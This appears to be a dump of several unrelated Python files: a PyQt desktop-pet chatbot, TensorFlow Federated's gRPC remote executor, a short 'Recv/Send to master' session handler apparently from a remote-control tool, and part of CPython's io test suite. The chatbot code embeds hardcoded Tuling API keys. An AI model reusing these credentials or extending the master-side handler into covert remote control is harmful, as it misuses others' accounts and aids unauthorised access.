'35ff2856b55e4a7f9eeb86e3437e23fe', '820c4a6ca4694063ab6002be1d1c63d3',
]
while True:
url = 'http://www.tuling123.com/openapi/api?key=%s&info=%s'
response = requests.get(url % (random.choice(appkeys), inputs))
reply = response.json()['text']
if u'当天请求次数已用完' in reply: continue
return reply
'''随机做一个动作'''
def randomAct(self):
if not self.is_running_action:
self.is_running_action = True
self.action_images = random.choice(self.pet_images)
self.action_max_len = len(self.action_images)
self.action_pointer = 0
self.runFrame()
'''完成动作的每一帧'''
def runFrame(self):
if self.action_pointer == self.action_max_len:
self.is_running_action = False
self.action_pointer = 0
self.action_max_len = 0
self.setImage(self.action_images[self.action_pointer])
self.action_pointer += 1
'''设置当前显示的图片'''
def setImage(self, image):
self.image.setPixmap(QPixmap.fromImage(image))
'''随机导入一个桌面宠物的所有图片'''
def randomLoadPetImages(self):
cfg = self.cfg
pet_name = random.choice(list(cfg.PET_ACTIONS_MAP.keys()))
actions = cfg.PET_ACTIONS_MAP[pet_name]
pet_images = []
for action in actions:
pet_images.append([self.loadImage(os.path.join(cfg.ROOT_DIR, pet_name, 'shime'+item+'.png')) for item in action])
iconpath = os.path.join(cfg.ROOT_DIR, pet_name, 'shime1.png')
return pet_images, iconpath
'''鼠标左键按下时, 宠物将和鼠标位置绑定'''
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.is_follow_mouse = True
self.mouse_drag_pos = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
'''鼠标移动, 则宠物也移动'''
def mouseMoveEvent(self, event):
if Qt.LeftButton and self.is_follow_mouse:
self.move(event.globalPos() - self.mouse_drag_pos)
event.accept()
'''鼠标释放时, 取消绑定'''
def mouseReleaseEvent(self, event):
self.is_follow_mouse = False
self.setCursor(QCursor(Qt.ArrowCursor))
'''导入图像'''
def loadImage(self, imagepath):
image = QImage()
image.load(imagepath)
return image
'''随机到一个屏幕上的某个位置'''
def randomPosition(self):
screen_geo = QDesktopWidget().screenGeometry()
pet_geo = self.geometry()
width = (screen_geo.width() - pet_geo.width()) * random.random()
height = (screen_geo.height() - pet_geo.height()) * random.random()
self.move(width, height)
'''退出程序'''
def quit(self):
self.close()
sys.exit()
|
remote_executor.py
|
# Lint as: python3
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import logging
import queue
import threading
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import anonymous_tuple
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl import executor_base
from tensorflow_federated.python.core.impl import executor_service_utils
from tensorflow_federated.python.core.impl import executor_value_base
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
@property
def type_signature(self):
return self._type_signature
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
self._thread_pool_executor = thread_pool_executor
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('request_iter: waiting for request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug('request_iter: got request of type %s',
val[0].WhichOneof('request'))
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug('request_iter: got None request')
# None means we are done processing
return
response_iter = stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('response_thread_fn: waiting for response')
for response in response_iter:
logging.debug('response_thread_fn: got response of type %s',
response.WhichOneof('response'))
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except grpc.RpcError as error:
logging.exception('Error calling remote executor: %s', error)
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
async def send_request(self, request):
"""Send a request on the bidi stream."""
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance.
NOTE: This component is only available in Python 3.
"""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
if rpc_mode == 'STREAMING':
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def __del__(self):
if self._bidi_stream:
self._bidi_stream.close()
del self._bidi_stream
async def create_value(self, value, type_spec=None):
value_proto, type_spec = (
executor_service_utils.serialize_value(value, type_spec))
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if not self._bidi_stream:
response = self._stub.CreateValue(create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if not self._bidi_stream:
response = self._stub.CreateCall(create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
async def create_tuple(self, elements):
elem = anonymous_tuple.to_elements(anonymous_tuple.from_container(elements))
proto_elem = []
type_elem = []
for k, v in elem:
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateTupleRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.NamedTupleType(type_elem)
request = executor_pb2.CreateTupleRequest(element=proto_elem)
if not self._bidi_stream:
response = self._stub.CreateTuple(request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_tuple=request))).create_tuple
py_typecheck.check_type(response, executor_pb2.CreateTupleResponse)
return RemoteValue(response.value_ref, result_type, self)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature,
computation_types.NamedTupleType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if not self._bidi_stream:
response = self._stub.CreateSelection(request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if not self._bidi_stream:
response = self._stub.Compute(request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
|
shell.py
|
# Date: 06/05/2018
# Author: Pure-L0G1C
# Description: Recv/Send to master
import sys
import time
from queue import Queue
from threading import Thread, RLock
class Shell(object):
def __init__(self, sess_obj, interface):
self.interface = interface
self.sess = sess_obj
self.is_alive = True
self.recv = Queue()
self.lock = RLock()
def start(self):
t1 = Thread(target=self.listen)
t2 = Thread(target=self.recv_manager)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
t1.join()
t2.join()
def listen(self):
while self.is_alive:
recv = self.sess.recv()
if recv:
self.recv.put(recv)
else:
self.is_alive = False
self.interface.disconnect_client(self.sess)
def recv_manager(self):
while self.is_alive:
if self.recv.qsize():
with self.lock:
recv = self.recv.get()
self.display_text('Data: {}'.format(recv['args']))
def send(self, code=None, args=None):
self.sess.send(code=code, args=args)
def display_text(self, text):
print('{0}{1}{0}'.format('\n\n\t', text))
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import textwrap
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import (
assert_python_ok, assert_python_failure, run_python_until_end)
from test.support import FakePath, skip_if_sanitizer
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(support.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(support.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
